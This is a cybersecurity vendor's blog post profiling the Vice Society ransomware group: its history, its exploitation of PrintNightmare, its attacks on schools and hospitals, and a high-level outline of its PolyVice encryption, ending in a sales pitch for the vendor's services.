With a penchant for the susceptible education sector, Vice Society has been making headlines this year by hitting K-12 school districts, apart from healthcare and non-governmental organizations. As stated in an FBI advisory, cybersecurity experts expect it to ramp up its attacks throughout the latter half of 2022 and into 2023.
Being one of the most prolific ransomware groups in 2022, Vice Society ransomware quickly gained the interest of our cybersecurity analysts at Securin who took a deep dive into the secrets behind Vice Society.
In this blog:
-
Securin’s Detection Script for PrintNightmare Vulnerabilities
Vice Society: A Brief History
It is believed that Vice Society, also tracked as DEV-0832, is a Russian-based group active since December 2020.
Vice Society, unlike other ransomware groups, is essentially a hacking group that first appeared in the news in August 2021 and has been associated with multiple intrusion, exfiltration and extortion attacks ever since.
The threat actors have a history of deploying multiple variants of ransomware, such as Hello Kitty or Five Hands, Zeppelin, and an in-house ransomware also called Vice Society. Since Vice Society and HelloKitty use similar naming extensions and tactics for their encrypted files–.kitty or .crypted–it is believed that there is a link between the two.
Figure 1: Vice Society Ransomware Threat Activity
Vice Society Ransomware Cheat Sheet
Vice Society ransomware operators deploy a malicious Dynamic-link library (DLL) to exploit the two PrintNightmare flaws. They have also been observed to encrypt both Windows and Linux systems using OpenSSL (AES256 + secp256k1 + ECDSA).
Though Vice Society has also been tied to using VMware ESXi vulnerabilities, no CVE associations have been conclusively identified for the threat actor.
Securin Releases Detection Script to Address the PrintNightmare Vulnerabilities
In July 2021, within a few days of active exploitation, Securin’s analysts developed a detection script for organizations to address the PrintNightmare vulnerabilities and secure their attack surfaces from further exploitation. Both PrintNightmare vulnerabilities were also added of the Department of Homeland Security’s CISA Known Exploited Vulnerabilities Catalog in November 2021.
Securin’s Vulnerability Intelligence Platform Identifies Assets and Helps Keep Your Attack Surface Robust
With the help of Securin’s Vulnerability Intelligence platform, Securin experts predicted the likelihood of more attacks leveraging the two PrintNightmare vulnerabilities. Here is a deeper look into how they used predictive analytics to assess the possibilities of future attacks.
This CVE was tagged as extremely critical from the very beginning and also carries the highest predictive score of 38.46 on Securin’s Vulnerability Intelligence platform. The CVE is associated with four ransomware families, namely, Black Basta, Vice Society, Conti, and Magniber.
In contrast to CVE-2021-34527, this CVE did not receive Securin’s highest predictive score of 38.46 till February 2022, after becoming associated with multiple ransomware families such as Magniber, Vice Society and Conti.
Our analysts have been analyzing the PrintNightmare vulnerabilities since the first wild proofs of concept were discovered in June 2021. Here is a graph showing how Securin was able to predict the exploitability of the CVEs much prior to its association with ransomware groups:
History of Attacks by Vice Society Ransomware
The threat group’s most recent victim, the Cincinnati State Technical and Community College, comes in the wake of the attack on the second largest school district in the United States, the Los Angeles Unified School District (LAUSD), in June 2022, which brought the capabilities of the group to the limelight and initiated warnings from FBI, NSA and the Department of Homeland Security CISA.
Other high-profile education sector attacks include the Austrian Medical University of Innsbruck that fell prey to the group in June 2022, affecting IT systems and 3,200 students.
Here is a list of the other attacks carried out by Vice Society:
|
Targets |
Month |
Impact of the Attack |
|
November 2022 |
PII and documents stolen, IT disruption affecting 10,000 students and 1,000 staff |
|
|
June 2022 |
IT disruption affecting 3,400 students |
|
|
June 2022 |
Large-scale services outage impacting 1.3 million people and tourists visiting the city |
|
|
May 2022 |
Los Angeles city and 31 municipalities hit by the cyberattack. 640,000 students PII affected. 500 GB data stolen |
|
|
February 2022 |
dumping of contractors’ data online, thousands of files dumped onto leak site |
|
|
January 2022 |
took down card machines in 600 stores and forced some to close their doors |
|
|
December 2021 |
93,000 stolen files were published by the gang |
|
|
September 2021 |
disrupted all of their locations and resulted in patient data theft |
|
|
September 2021 |
affected several IT systems, network and electronic medical record system |
|
|
mid-2021 |
dumped the district’s data on their dark web leak site |
|
|
August 2021 |
electronic health record (EHR) downtime faced with extensive IT disruption |
|
|
August 2021 |
administrative servers affected and sensitive documents exfiltrated |
|
|
August 2021 |
IT system disruption |
Interesting Trends
-
New PowerShell data theft tool:
Vice Society ransomware operators were observed utilizing a PS script recovered from a Windows Event Log (WEL) with an Event ID 4104: Script Block Logging event. The exfiltrator uses ‘living off the land’ binaries and scripts that are therefore likely to avoid detection by security software, keeping the progress stealthy till the penultimate step when the ransomware is deployed and encryption begins.
Vice Society ransomware was observed using a custom ransomware encryption that uses a strong hybrid encryption algorithm that combines asymmetric encryption with the NTRUEncrypt scheme and symmetric encryption with ChaCha20-Poly1305. The new encryptor, dubbed ‘PolyVice’, has a lot of similarities in the code to that of Chilly ransomware and SunnyDay ransomware. It also gives Vice Society a unique attack signature, moving away from their usual ‘.ViceSociety’ extension, to ‘AllYFilesAE’.
Here is a short insight into how the encryption functions:
- The payload imports a pre-generated 192-bit NTRUEncrypt public key upon launch.
- Another random 112-bit NTRUEncrypt private key, unique to each victim, is generated by the payload.
- The pair of keys is used for encrypting the ChaCha20-Poly1305 symmetric keys that are unique to each file.
- The NTRU key pair is encrypted to protect it from attempts to retrieve stolen data.
An interesting trend was observed recently by our cybersecurity experts, where the ransomware group was noticed swapping between multiple ransomware strains. Though not the first to be implementing multiple ransomware strains, the tactics are similar to two other groups—the Sandworm Team and TA505. Vice Society ransomware has been switching between Zeppelin, BlackCat, QuantumLocker, and a Vice Society-branded variant of Zeppelin ransomware.
In some attacks, the group has also skipped the ransomware deployment stage, opting for stealing data from the victims and extorting them and threatening to leak the stolen files online.
Scanner Coverage: Hiding in Plain Sight?
Common scanners such as Nessus, Qualys and others, were able to spot the PrintNightmare vulnerabilities leveraged by Vice Society ransomware. As a result, patching and ensuring that the organization’s attack surface is secure should be of foremost priority.
How does Vice Society Ransomware Attack?
Vice Society MITRE ATT&CK Map and Indicators of Compromise
|
Indicators of Compromise |
|
MD5:
SHA1:
SHA256:
URL:
IP Addresses:
Other Info:
|
How can Securin Help Protect Your Organization Against Vice Society Ransomware Attacks?
The effect of ransomware attacks on colleges and K-12 schools in the US alone is an estimated $3.56 billion. With so many individuals at risk of data theft, improving cyber security for the future is the solution. Since the data is often unrecoverable, it is important for school districts to stay ahead of the attacker.
As highlighted in Securin’s Ransomware Spotlight Report 2022 Q2 and Q3, the total number of vulnerabilities tied to ransomware has risen to 323, clocking a 466% growth from 2019. Overall, 35 vulnerabilities have become associated with ransomware in 2022, with 159 key ransomware associated vulnerabilities trending as a point of interest for malicious actors. This emphasizes the need for periodic vulnerability management and patching to maintain good cyber hygiene.
Securin’s Attack Surface Management platform helps improve your organizational security posture through actionable insights by leveraging our excellent threat hunting expertise. Click here to learn more about Securin.
Worried about how susceptible your organization is to a ransomware attack?
Get a Ransomware Exposure Assessment done today!
Click here to talk to us.